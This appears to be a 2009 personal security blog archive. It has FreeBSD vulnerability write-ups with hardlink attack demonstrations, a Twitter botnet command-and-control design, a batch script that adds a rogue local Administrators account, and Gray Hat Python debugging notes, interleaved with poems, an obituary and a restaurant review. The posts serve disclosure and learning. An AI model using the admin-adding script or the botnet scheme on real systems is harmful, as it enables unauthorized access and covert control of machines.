#
# Copyright (c) 1999  Matt Dillon
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# $FreeBSD: src/etc/rc.d/tmp,v 1.40 2009/05/17 08:25:02 danger Exp $
#

# PROVIDE: tmp
# REQUIRE: mountcritremote

. /etc/rc.subr

name="tmp"
stop_cmd=':'

load_rc_config $name

# If we do not have a writable /tmp, create a memory
# filesystem for /tmp.  If /tmp is a symlink (e.g. to /var/tmp,
# then it should already be writable).
#
case "${tmpmfs}" in
[Yy][Ee][Ss])
 if ! /bin/df /tmp | grep -q "^/dev/md[0-9]"; then
  mount_md ${tmpsize} /tmp "${tmpmfs_flags}"
  chmod 01777 /tmp
 fi
 ;;
[Nn][Oo])
 ;;
*)
 if /bin/mkdir -p /tmp/.diskless 2> /dev/null; then
  rmdir /tmp/.diskless
 else
  if [ -h /tmp ]; then
   echo "*** /tmp is a symlink to a non-writable area!"
   echo "dropping into shell, ^D to continue anyway."
   /bin/sh
  else
   mount_md ${tmpsize} /tmp "${tmpmfs_flags}"
   chmod 01777 /tmp
  fi
 fi
 ;;
esac

The default behavior of tmpmfs (defined in /etc/defaults/rc.conf) is set to AUTO. This causes the '*' case to be hit in the script. If a local user creates a file (not a directory) in /tmp called .diskless and the system is rebooted or the script is called directly, the system will either drop into /bin/sh prior to reaching DAEMON or the system will remount /tmp with a potentially smaller size than expected. Both of these conditions are probably not ideal and the prior condition could lead to a boot-up DoS, depending upon local system configurations. The latter condition is harder to fix once the system is in multi-user mode, and especially if users connect via SSH. This is because the /tmp directory will contain open files and/or sockets. So, a fix in this case would also require dropping the system into single-user mode. Because FreeBSD still allows a user to hardlink to a file that is not owned by that user (which has caused at least one issue in the past), the user can cause some shenanigans:


> echo $uid
1001
> ll /tmp
total 12
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .ICE-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .X11-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .XIM-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .font-unix
drwxrwxr-x  2 root  operator  512 Dec  7 15:10 .snap
-rw-r--r--  1 root  wheel       0 Dec  7 15:25 foo
> cd /tmp
> ln foo .diskless
> ll /tmp
total 12
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .ICE-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .X11-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .XIM-unix
-rw-r--r--  2 root  wheel       0 Dec  7 15:25 .diskless
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .font-unix
drwxrwxr-x  2 root  operator  512 Dec  7 15:10 .snap
-rw-r--r--  2 root  wheel       0 Dec  7 15:25 foo

The user could hide his or her actions because the hardlink would not show who setup the hardlink, assuming a file exists in /tmp that does not belong to the user. Rather, it shows the current permissions on the hardlinked file.

My initial idea at a fix is to include a new variable in /etc/rc.d/cleartmp that would be set to YES in /etc/defaults/rc.conf. The variable would be similar to clear_tmp_X (maybe called clear_tmp_safe?), calling a routine to wipe and remake the directory /tmp/.diskless. Once this script was ran by root, a subsequent call to /etc/rc.d/tmp upon reboot or directory would act right for most cases.

Diskless clients should be OK, though, as long as /tmp/.diskless is not included in /etc/mtree/BSD.root.dist. When /etc/rc.d/cleartmp would run the first time, it would already be on a memory /tmp file system (assuming /conf doesn't contain anything to point to a residual mount point that could have been tampered). Clients also using memory-backed /tmp should be OK, since the variable will force a creation of a memory-backed /tmp mount point. But, some other eyes should look at this prior to changing the behavior.

When I went through a setup of FreeBSD 8.0 using standard / default / auto-assign values, the system will create its own /tmp mountpoint with a size of 500MB or so. So, if one considered this a "default" setup, then having the case of /tmp remounted (and possibly filling up because of the 20MB size) would merit a CVSSv2 score probably no higher than 1.9 (AV:L/AC:M/Au:N/C:N/I:N/A:P). Worst case, the CVSSv2 score would merit a 4.7 (AV:L/AC:M/Au:N/C:N/I:N/A:C), in my opinion.

Appendix
Sample attack on a symlink'd /tmp:


> ls -la /tmp
lrwxr-xr-x  1 root  wheel  7 Dec  7 15:55 /tmp -> var/tmp
> cd /tmp
> ll
total 12
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .ICE-unix
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .X11-unix
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .XIM-unix
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .font-unix
-rw-r--r--  1 root  wheel    0 Dec  7 15:55 foo
drwxrwxrwt  2 root  wheel  512 Dec  7 15:44 vi.recover
> ln foo .diskless
> ll
total 12
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .ICE-unix
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .X11-unix
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .XIM-unix
-rw-r--r--  2 root  wheel    0 Dec  7 15:55 .diskless
drwxrwxrwt  2 root  wheel  512 Dec  7 15:55 .font-unix
-rw-r--r--  2 root  wheel    0 Dec  7 15:55 foo
drwxrwxrwt  2 root  wheel  512 Dec  7 15:44 vi.recover
> su -
Password:
test-8# /etc/rc.d/tmp start
*** /tmp is a symlink to a non-writable area!
dropping into shell, ^D to continue anyway.
#

Sample attack on a mounted /tmp:


> mount
/dev/ad0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/ad0s1f on /usr (ufs, local, soft-updates)
/dev/ad0s1d on /var (ufs, local, soft-updates)
/dev/ad0s1e on /tmp (ufs, local, soft-updates)
> df /tmp
Filesystem  1K-blocks Used  Avail Capacity  Mounted on
/dev/ad0s1e    507630   16 467004     0%    /tmp
> ll /tmp
total 14
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .ICE-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .X11-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .XIM-unix
drwxrwxrwt  2 root  wheel     512 Dec  7 15:22 .font-unix
drwxrwxr-x  2 root  operator  512 Dec  7 15:10 .snap
-rw-r--r--  1 root  wheel       0 Dec  7 15:25 foo
> ln foo .diskless
> su -
Password:
test-8# /etc/rc.d/tmp start
test-8# mount
/dev/ad0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/ad0s1f on /usr (ufs, local, soft-updates)
/dev/ad0s1d on /var (ufs, local, soft-updates)
/dev/ad0s1e on /tmp (ufs, local, soft-updates)
/dev/md0 on /tmp (ufs, local)
test-8# df /tmp
Filesystem 1K-blocks Used Avail Capacity  Mounted on
/dev/md0       19566    4 17998     0%    /tmp
test-8# ll /tmp
total 2
drwxrwxr-x  2 root  operator  512 Dec  7 15:59 .snap

Near Miss Issue with FreeBSD periodic locate Script

2009-12-06T15:46:00.005-06:00

Whilst looking around at the periodic scripts for FreeBSD, I noticed something interesting with the locate(1) script:

 locdb=/var/db/locate.database

 touch $locdb && rc=0 || rc=3
 chown nobody $locdb || rc=3
 chmod 644 $locdb || rc=3

 cd /
 echo /usr/libexec/locate.updatedb | nice -n 5 su -fm nobody || rc=3
 chmod 444 $locdb || rc=3;;

As root, the script allows the nobody account read-write access to the file and subsequently runs the locate commands as nobody. This allows only public or nobody-owned files to be recorded in the locate database, which is usually desired. If the script ran as root, then everyone's files would be listed, which may leak some private information.

At first, I tried to see, if as nobody, I could symlink the file to something else, such as /etc/master.passwd or /etc/spwd.db. There seems to exist a possible race condition between the execution of the touch, chown, chmod and then the echo'd niced su command ran as nobody (which would open the file, making an unlink difficult). And since the nobody account is often used by ports (and inetd in one case), a vulnerability in that port could grant access to the nobody account. (Un)fortunately, /var/db is not writable by the nobody account. Because of this, even though nobody owns the file and has proper permission to read-write the file, the account does not have the ability to modify the directory. If the account cannot modify the directory, the account cannot create or remove the file.

With that vector not possible, the next thought was to explore the nobody account's ability to modify a file that others will read. If there existed some type of vulnerability within locate, such as memory corruption that could lead to exploitation, the locate db could be used as the vector. I'm not the best when it comes to spotting vulnerabilities, so by no means trust my analysis. The only "issue" I noticed was in locate.c. search_mmap won't munmap and close the file descriptor if fastfind_mmap (via fastfind.c) exits abruptly. This can occur here:


#endif /* FF_MMAP */
  } else {    /* slow step, =< 14 chars */
   count += c - OFFSET;
  }

  if (count < 0 || count > MAXPATHLEN)
   errx(1, "corrupted database: %s", database);

But, who cares. The process exits, so the mappings and file descriptors will get discarded anywho (as far as I know, which may be wrong). If the mappings aren't discarded, then this could eventually lead to memory exhaustion, especially if the file size was artificially inflated to be bigger than need be. But, this seems a silly way to do a local DDoS.

So, yeah, if someone notices a vulnerability with locate that could be exploited by corrupting the locate db, someone could potentially gain access to that user's account once that user ran the locate utility. Prior to this, though, the attacker would have to gain access to the nobody account, which isn't trivial, but seems probable due to all of the ports that utilize the account in some fashion.

Or, tl/dr, a near miss with locate.

Botnet Command And Control With Twitter

2009-12-02T16:50:00.007-06:00

Using Twitter as a command and control (C&C) for botnets is a novel idea. Googling for twitter+botnet returns a bunch of results, with some diamonds. Listening to Risky Business Episode #121 got the brain juices flowing, though, on a way to be a bit more creative on the C&C structure.

Step 0: C&C Language
Out of scope for this discussion.

Step 1: Have Persistent Data Returned in a Web App
A possible way to get persistent data returned within an arbitrary web application would be to find a SQLi vulnerability or persistent XSS issue with some random application on the web. The idea is to be able to enter a string such as the following:

[PREFIX][ENCODED COMMAND WITH SIGNATURE]

This string could be commented out or a JavaScript variable. It just has to be present. The "PREFIX" would be used by the botnet as a search variable. If/when found, the appended command (with some type of signature to ensure integrity) would then be validated, and if good, used. The PREFIX could be updated in the future, though.

Step 2: Shorten a URL and Do Math
Enter the prior web application's URL into a popular URL shortener, such as bit.ly, yfrog.com, etc. Save the resulting shortened URL path. For example, the bit.ly shortened URL for http://www.google.com is http://bit.ly/14d7yE. Save the 14d7yE and associate it to bit.ly somehow.

Understand the range of values the shortener provides. bit.ly seems to use [0-9][a-z][A-Z], which would be an alphabet of 62 characters. Map these alphabets to some numbering system. For example, the google.com bit.ly shortened URL could map to this number:

1*62^5 + 4*62^4 + d*62^3 + 7*62^2 + y*62^1 + E*62^0, which is a number smaller than 990014512.

Call this number P.

Randomly pick a number and call it Q. Take P * Q to get N. N gets included with the botnet members. N should be a variant that can be updated by the botnet members.

Encode Q the same way that P was encoded by the shortener. Q now equals the PREFIX value from above.

Step 3: Inject PREFIX into App
Inject Q / PREFIX into the web app, along with the encoded commands.

Step 4: Create a Twitter Account (or Two, or 100)
Create a twitter account and upload a custom picture. Do not protect the account.

Step 5: Abuse Twitter Public Timeline (or Search) and PROFIT!
The twitter public timeline displays the tweets of 20 non-protected accounts with a custom picture, cached for a 60 second period. To request the current timeline in XML, GET http://twitter.com/statuses/public_timeline.xml.

With all of the available twitter accounts, tweet about the shortened URL. These accounts can tweet about any other URL they want. The botnet monitors the public timeline. The goal is to get one of these twitter accounts to be shown in the public timeline.

For whatever shorteners the botnet supports, it will have to follow each and every shortened URL. So, bit.ly may not be a good choice due to all of the false positives and traffic. All the same, a shortener that is rarely used may also stand out. Getting the tweets in the public timeline may be a numbers game.

Instead of using the timeline, the botnet could also search twitter for a shortener. For example, searching for short.to's shortener has a limited number of hits relative to bit.ly. One could use a list of shorteners to test this against and figure out a good one to use.

Once a shortener link is found, the botnet recreates the PREFIX / Q variable (called Q-prime) by taking the shortened URL, divided by the stored N variable. If the resultant Q-prime is an integer, then the botnet follows the link and searches for the Q-prime variable in the text of the site. If Q-prime is found, the botnet then attempts to decode the command, hopefully signed in some way.

Voilà!

Issues

Since the botnet only follows specific shortened URLs, the secrecy of the C&C server is somewhat impacted. Now, if Q is chosen is a way where it has a lot of coprime factors, then it seems more probable that N can be divided by a larger set of shortened URLs (Ps). But, I'm not a mathematician, so don't trust me here (or anywhere in this post :-)
If the Twitter accounts only tweet on the C&C shortened URL, the secrecy of the C&C system (and also the subversive nature of the Twitter accounts) is impacted. The accounts can send out random, harmless tweets to add noise.
The public timeline method seems cumbersome. The search method seems a bit more robust.
Systems that pound on twitter.com would probably reveal themselves to be bots

This seems to be a novel approach to running a C&C server advertised on Twitter. The botnet has no hardcoded data, outside of N, that would reveal the location of the C&C method. Subterfuge can be achieved with the twitter accounts to a point, assuming the prior tweets and links have something in common with the injected site. The bots could even search for other twitter stuff to add noise in the stream, such as popular accounts or sites.

To Face Death

2009-11-10T20:37:00.002-06:00

Free
Free from pain, from prison, from silence
Free

Freedom
Fought for, painfully slowly, one bit
at a
time
And
slower
While love is ripped more and more
And slower
He fought
For Freedom

Lucky juxtaposed with misfortune
Freedom tied to death
Companions that should not be, but are
But, in the end
Free

Free

An Ode to My Father

2009-11-10T09:41:00.002-06:00

Rest my father
Sweet dreams into the abyss
Orion, oh mighty hunter
Guide my father through the celestial night
Show him where to draw upon peace
Lay his head gently down int the starry sky above

John Lewis Passki, 1921 - 2009

2009-11-10T01:48:00.001-06:00

John Lewis Passki
88 Years Old. New Brighton, MN.

Born in Buffalo New York, June 26th, 1921. Lost his battle with Parkinson's disease on November 9th, 2009. Beloved Husband of Marsha. Proud father of Jonathan. Stepfather to Lara Masica and Thomas Daryl Sanders (deceased). Also survived by grandchildren Kristina and Larissa Masica. As per his wishes no funeral or memorial services will be held.

A very special thanks to St. John's Hospital staff for their wonderful treatment and to Heartland Hospice for their gentle compassionate and loving care. Rest in peace my darling. We love you and will miss you.

Security Side Projects

2009-11-09T09:44:00.002-06:00

Here's a list of side projects / cool ideas I want to spend some time on:

Find the encrypted password on PGP Disk: Been wanting to do this for about 5 years w/ PointSec and Joanna's work on Evil Maid prompted me again. I got PGP for Mac and an external drive. Now I just need to play :-)
Get a passive demux for modem signals: My gas company CenterPoint Energy uses my phone line to communicate information back to the mothership. I'm not only interested in what is communicated, but what security controls, if any, are present. For example, can I spoof my number or recover credentials to spoof as my neighbor? There are programs and devices out there that do this, but they are released to federal or state law enforcement agencies or are insanely expensive. UPDATE: found this, seems plausible!
Bayesian Logging: This would be similar to profiling an application, but using the call frequency and patterns to determine unusual issues. The idea is to log when a function is being called within an application by inserting logging statements within each function. Intuitively, when I say log into OpenSSH, there are a set of common sequence of functions that run within some time frame. If an attacker finds a pre-auth issue in OpenSSH and exploits it, this sequence and/or time frame will be disrupted. A Bayesian-style analysis daemon on the back-end would hopefully notice this condition and alert as needed. False-positives could be reclassified, training the Bayesian filter
John the Ripper running in Amazon EC2: Pretty basic. Install John the Ripper in the cloud and crack passwords. Maybe would do a pay model to cover costs. Any extra would be donated back to Openwall, if possible, or if not, some .org.

If any of these have been done, please let me know!

To My Father

2009-11-08T17:37:00.002-06:00

Do not go gentle into that good night,
Old age should burn and rave at close of day;
Rage, rage against the dying of the light.

Though wise men at their end know dark is right,
Because their words had forked no lightning they
Do not go gentle into that good night.

Good men, the last wave by, crying how bright
Their frail deeds might have danced in a green bay,
Rage, rage against the dying of the light.

Wild men who caught and sang the sun in flight,
And learn, too late, they grieved it on its way,
Do not go gentle into that good night.

Grave men, near death, who see with blinding sight
Blind eyes could blaze like meteors and be gay,
Rage, rage against the dying of the light.

And you, my father, there on the sad height,
Curse, bless, me now with your fierce tears, I pray.
Do not go gentle into that good night.
Rage, rage against the dying of the light.

-- Dylan Thomas

Exotic Liability #37 Podcasts and Differences

2009-10-27T21:04:00.006-06:00

I enjoyed listening to the last two @exoticliability podcasts from @indi303 and Ryan Jones.

Podcast #37 covered intel gathering for clients, leaky strippers, and leaky consultants saying stupid things on social networks. Having worked with a couple firms in the past and doing some pentesting, I somewhat agree on their general opinion with information / intelligence gathering during a pentest. In both firms I worked with, information gathering usually received 10% of the budget for the engagement. This was a management decision of the firms, although I'm sure flexible.

Looking back, if I was in a management position, I think I would have been cautious on moving the 10% level higher across the board until I saw the value proposition in the results. If we have been doing X and X has been working, why fix it? To be honest, though, the thought of doing greater than 10% of information gathering never crossed any of our minds. That in and of itself, is probably an issue. Why not do 25, 50, or 75% of the engagement as information gathering (or some other component)? And this goes to a bigger question, what is the right amount for any phase of the engagement? Constraints, such as target scope, types of tests, etc., would play heavily into this, of course. Still, we treat these numbers as sacred and they aren't.

#37 also talked about data leakage. Chris brought up an example of someone leaking the data center location of a possible client. I got two thoughts on this: the knowledge of a data center location should not decrease its security and if the client thinks the secret is important, it is important. I don't use foursquare, but, yeah, tweeting your location whilst at a client is stupid. I disabled my twitter clients from announcing this data a while ago, because, seriously, anyone needing to know where I'm at is just going to call me. They are not going to look up my longitude and latitude on Twitter, paste that into Google Maps, and then call me. Building on my thoughts above, though, sensitive data is perceived to be important by the client, regardless of its actual importance to reality. In our last paychecks, our clients paid our wage in some way, shape or form. Tomorrow, they might not if you don't care about them.

Easy is Cheesy

2009-10-15T08:22:00.007-06:00

I received a brand-new, corporate-blessed workstation last week. Since I have a little downtime at my new client, I poked around at the system. The workstation is based on a standard build, with some security tools installed. My account is not part of the local Administrators group (Windows-based OS), so I am limited in what can be installed. My goal was to obtain local admin privileges, which took about 4 hours to achieve.

Usually, on a new system, I like to figure out what's already existing in log files and such. The system had a bunch of automated install files from the image creation and subsequent updates. Out of all the files I parsed, only one had password information in it. The passwords were redacted, though, via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and see if there was an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.

I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not utilized these files in any way I found to execute a file (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.1.1 skills could be of some use :-) Some other files also had weak permissions, but none of them were either in use or going to be assumed to be in use in the foreseeable future. But, here's where it gets funny: many files in Program Files had "BUILTIN\Users:C" or "Everyone:F" (via xcacls.exe).

Pulling up Task Manager showed a list of programs that ran as SYSTEM. The 'exploit' was just replacing (rename, copy) an executable with something that would do a nefarious task. Being ol' school, I whipped up the following batch file and converted it to an EXE:


@echo off
SET OURUSER=YYYYY
SET OURPW=XXXXX
SET OURGROUP=Administrators

:VARS
SET NETEXE=%SYSTEMROOT%\SYSTEM32\net.EXE
SET FINDS=%SYSTEMROOT%\SYSTEM32\findstr.EXE
SET OUTPUT=%SYSTEMROOT%\TEMP\%OURUSER%.TXT

IF EXIST %OUTPUT% DEL %OUTPUT%

echo [X] Attempting to add user %OURUSER%... >> %OUTPUT%
%NETEXE% user %OURUSER% %OURPW% /ADD  >> %OUTPUT%
echo [X] Checking user creation... >> %OUTPUT%
%NETEXE% user | %FINDS% "%OURUSER%"  >> %OUTPUT%
echo [X] Attempting to add user %OURUSER% to group %OURGROUP%... >> %OUTPUT%
net localgroup %OURGROUP% %OURUSER% /ADD  >> %OUTPUT%
echo [X] Checking group addition... >> %OUTPUT%
net localgroup %OURGROUP% | %FINDS% "%OURUSER%"  >> %OUTPUT%

Pretty simple. Once converted, I just renamed an EXE, copied this EXE to its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is the client had a HIDS program installed but only turned on to monitor versus block. The HIDS detected the rogue program and might have prevented such an elementary attack.

Sometimes, easy is cheesy, but also just as valid as an 0-day.

[1] Well, this took a little bit of troubleshooting. The batch to EXE converter acted a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.

Fish & Chips! The Anchor is Open

2009-10-07T17:27:00.006-06:00

So, Northeast has a new fish & chips spot, The Anchor Fish & Chips. I love local businesses, especially when it comes to bars, pubs, and restaurants. I'm not a big foodie at all. I like White Castle for some things, Red Stag Supper Club for others. It's all about mood for me. Whatever that means...

I'm not a food reviewer, so don't expect a lot of multi-syllabled words. Expect more of Uncle Walt Whitman here. Go see the building if you like that sort of stuff. It works for the neighborhood. Also, experience the service yourself, it may have been better than it was for me. I'm about food and beer.

The meal, when it came out, was moderately good (3 out of 5). The chips themselves were awesome! The salt, golden to amber color, and crisp to mash-like filing made the chips very tasty. The fish also was good, but the chips were more memorable to me. The fish batter was somewhat light, sometimes being a bit greasy. If it wasn't a little greasy, I'd probably walk out because the damn thing just came out of a hot fryer, regardless of the time it spent under the hot lights. Being silly, I thought it was an English fish & chips spot, so I was again saddened to not see any peas (mushy or otherwise) w/ the meal. But, it's not English, it's Irish. I guess the Irish don't like their mushy peas with fish, so they put them on the side for $2.50. (Maybe peas are Protestant or something, who knows...)

Selfish Recommendation #1: throw just a bit of mushy peas in the basket for a week and see if people comment one way or the other. Let me know when you do this so I can be cheap and get some for free. ;-)

The only annoyance I had was with one of the Governors (the thin boy that needs to eat more). I asked for some malt vinegar and I was almost ran out of the bar. He educated me on how people that use malt vinegar are Neanderthal at best and Iowans at worst. Malt vinegar doesn't bring out the flavor of anything and only overshadows the chips, he continued. And, white vinegar is God's food or something, with an astringency that truly works with the chip. I should have called bullshit or something.

Prior to this, I did realize they had white vinegar on the counter. I tried a couple drops on my finger prior, to see if I would like it. I_didn't_taste_anything. I tried again, and got the faintest vinegar taste, with a little bit of sourness. I passed this observation to the Guv, but I think at this time he thought I probably was from Iowa. I proceeded to create a swimming pool of vinegar in my basket when the meal came out, but all for naught. (Maybe it had something to do with the vinegar being Heinz.)

I felt like an idiot, wondering if my years of malt vinegar have destroyed my inexperienced palate. I then felt like I was duped, wondering if there was a camera somewhere recording my expressions, which should be on Youtube by now or something. The Guv stated that only true fish & chip connoisseurs have the balls to douse their meal with God's white vinegar. I really wanted to throw the bottle at him, but that would have ended the meal on an unfortunate note. And, I still thought there was a camera somewhere, even though I cased out the spot over and over.

Unselfish Recommendation #1: Don't make fun of your customers, unless they are from Iowa. I'll probably try out the spot again, but I really felt like an idiot. Having molten cheese spill on your fingers or burn your lips because you didn't listen to Renee at Matt's proves you're an idiot. Being made fun of never having a Jucy Lucy and not knowing how to tackle one makes you feel like an idiot. That was the whole vinegar thing for me. There's a subtle difference here, but one is mea culpa and the other is tua culpa. Figure that out, and you'll be a better Guv, Guv.

Gray Hat Python Chapter 6.1 Minor Stuff

2009-08-25T12:09:00.005-06:00

In Chapter 6.1, "Soft Hooking with PyDbg", I had some minor issues getting Immunity Debugger to connect to Firefox. First, I had to quit and reload the debugger. Dunno why this was, but until then, no attachment attempts worked. Secondly, since I'm not use to Immunity Debugger, the following line from the chapter wasn't helpful:

Once you have accepted the site's SSL certificate and the page has loaded, attach Immunity Debugger to the firefox.exe process and set a breakpoint on nspr4.PR_Write.

Immunity Debugger help on Breakpoints (Ordinary):

You place this breakpoint by selecting the command in Disassembler and pressing F2, or over pop-up menu

.

Well, I had no idea where the assembly was for the nspr4.PR_Write routine. After digging around, I came across the "Executable modules" window. I did the following:

Sorted by name
Found the 'nspr4' module
Right-clicked and chose 'View names' in the drop down
In the 'Names in nspr4' window, typed in PR_Write' and selected the instance
Hit F2 (which caused the address to become red and an entry to appear in the 'Breakpoints' window

From there, I was able to complete the exercise with no problem.

Gray Hat Python Chapter 5 Mucho Love

2009-08-19T09:45:00.004-06:00

Continuing on with my ramblings on Gray Hat Python, I'm now onto Chapter 5 and have slowed a bit down. The best advice I can give is what Justin gave at the end of Chapter 4.3.2: get a program with a known vulnerability and start loading it up in the examples. I didn't do this at first, which made Chapter 5 pretty difficult to follow.

I am using a milw0rm exploit with a different shellcode payload. This at least has helped in exercise 5.3.1 and 5.3.2. By the way, you will need to modify the code samples for both examples to get them working correctly.

Example 5.3.1 findinstruction.py diff


--- findinstruction-orig.py 2009-08-19 14:37:13.000000000 -0500
+++ findinstruction.py 2009-08-19 14:37:35.000000000 -0500
@@ -16,7 +16,7 @@
         access      = code_page.getAccess( human = True )
 
         if "execute" in access.lower():
-            imm.log("[*] Found: %s (0x%08x)" % ( search_code, hit ), address = hit )
+            imm.Log("[*] Found: %s (0x%08x)" % ( search_code, hit ), address = hit )
 
 
     return "[*] Finished searching for instructions, check the Log window."

This threw me off. According to the Immunity Debugger documentation, both immlib.Debugger.Log() and immlib.Debugger.log() have the same prototype:


Log(self, msg, address=0, highlight=False, gray=False, focus=0)
Adds a single line of ASCII text to the log window. source code  
 
log(self, msg, address=0, highlight=False, gray=False, focus=0)
Adds a single line of ASCII text to the log window.

But, running w/ imm.log() kept on throwing an error that 'address' was an unexpected keyword argument. This is more of a bug w/ the debugger than the program, methinks. At this time, though, I was not able to load up the Immunity forums, so it's hard to say.

Example 5.3.2 badchar.py diff


--- badchar-orig.py 2009-08-19 14:26:15.000000000 -0500
+++ badchar.py 2009-08-19 14:32:37.000000000 -0500
@@ -1,4 +1,5 @@
 from immlib import *
+import binascii
 
 def main(args):
 
@@ -12,15 +13,16 @@
     # Shellcode to verify
     shellcode        = "<>"
     shellcode_length = len(shellcode)
+    shellcode = binascii.b2a_hex(shellcode)
 
     debug_shellcode = imm.readMemory( address, shellcode_length )
     debug_shellcode = debug_shellcode.encode("HEX")
 
     imm.log("Address: 0x%08x" % address)
-    imm.log("Shellcode Length : %d" % length)
+    imm.log("Shellcode Length : %d" % shellcode_length)
 
-    imm.log("Attack Shellcode: %s"    % canvas_shellcode[:512])
-    imm.log("In Memory Shellcode: %s" % id_shellcode[:512])
+    imm.log("Attack Shellcode: %s" % shellcode[:512])
+    imm.log("In Memory shellcode: %s" % debug_shellcode[:512])
 
     # Begin a byte-by-byte comparison of the two shellcode buffers
     count = 0

For the above, once the changes are made, then modify the script to include your shellcode. I was having problems getting the lists to contain the same type of characters. shellcode[] was containing actual numbers / letters (e.g. \x41 or 'A') whilst debug_shellcode[] contained strings of the numbers (e.g. '41'). The variables just needed to be renamed to the ones used in the program. (I can't think for the life of me why Justin used 'canvas' ;-)

Gray Hat Python Chapter 4.1 Love

2009-08-14T17:16:00.005-06:00

So, I gave up on Chapter 3.4.2 and went to Chapter 4. The first exercise is 4.1 Extending Breakpoint Handlers. The idea was to modify the process memory to replace the counter number with another random number between 1-100. Instead of this, the test harness printed out a static number (versus the counter) and was not able to modify the printed output. I found out I wasn't the only one with this issue. (And btw, thanks to Brad at stacksmash.org for his prior work with this book and blog posts. He has been very helpful!)

The first thing I wanted to see was what the context data looked like. PyDbg has a nice method called pydbg.pydbg.dump_context() which helped in troubleshooting. I added it here:


def printf_randomizer(dbg):
    
    # Read in the value of the counter at ESP + 0x4 as a DWORD
    parameter_addr = dbg.context.Esp + 0x4
    print dbg.dump_context()

I got the following context data:


CONTEXT DUMP
EIP: 77c4186a push byte 0×10
EAX: 0021fb88 ( 2227080) -> 0! (stack)
EBX: 00000000 ( 0) -> N/A
ECX: 0021fc98 ( 2227352) -> ..!…………………`….R…R……..!…….!………..!……….G..j..w………………..x…………R….!……………..x…….j..w………….h…….R…….R……`….R………………`…….`…..!…..< U..p……….. ………………..`….R…R……..!…….!………..!……….G..j..w………………..x…………R….!……………..x…….j..w………….h…….R…….R……`….R………………`…….`…..!…..< U..p……….. ..!…………………`….R…R……..!…….!………..!……….G..j..w………………..x…………R….!……………..x…….j..w………….h…….R…….R……`….R………………`…….`…..!…..< U..p……….. 0! (stack)
EBP: 0021fb8c ( 2227084) -> ..!………..!………..!.j..w..!.0.!…!…!.p.!..w..0.!.j..w..!…!…!…!…..d………….!.x…..!………..!.d…….%.1ld.!.p%………………JY..,_…………!…………. Y..p%…………!..V….!……………!………j..w..!…!….. (stack)
ESP: 0021fb80 ( 2227072) -> :…….0.!…!………..!………..!.j..w..!.0.!…!…!.p.!..w..0.!.j..w..!…!…!…!…..d………….!.x…..!………..!.d…….%.1ld.!.p%………………JY..,_…………!…………. Y..p%…………!..V….!……………!………j..w (stack)
+00: 1d1aba3a ( 488290874) -> N/A
+04: 00a9c994 ( 11127188) -> Loop iteration 4! (heap)
+08: 0021fc30 ( 2227248) -> ……….!…………. Y..p%…………!..V….!……………!………j..w..!…!…….!………..!…………………`….R…R……..!…….!………..!……….G..j..w………………..x…………R….!……………..x…….j..w…. (stack)
+0c: 0021fbbc ( 2227132) -> p! (stack)
+10: 1d1aaa9a ( 488286874) -> N/A
+14: 1d1aa8e0 ( 488286432) -> N/A

Counter: 2227248

The test harness was peeking at ESP+0x8 for the counter variable. On my Windows XP Pro SP3 system (running under Parallels on Mac), though, no counter variable I could tell was at ESP+0x8. Looking at ESP+0x4, though, existed what seemed to be an address (0x00a9c994) that PyDbg was hinted pointed to the heap, which contains the string. So, instead of a counter variable on the stack, the whole string is in the heap.

To read the counter variable, I changed the printf_randomizer from this:


def printf_randomizer(dbg):

    # Read in the value of the counter at ESP + 0x8 as a DWORD
    parameter_addr = dbg.context.Esp + 0x8
    counter = dbg.read_process_memory(parameter_addr, 4)

    # When we use read_process_memory, it returns a packed binary
    # string. We must first unpack it before we can use it further.
    counter = struct.unpack("L", counter)[0]
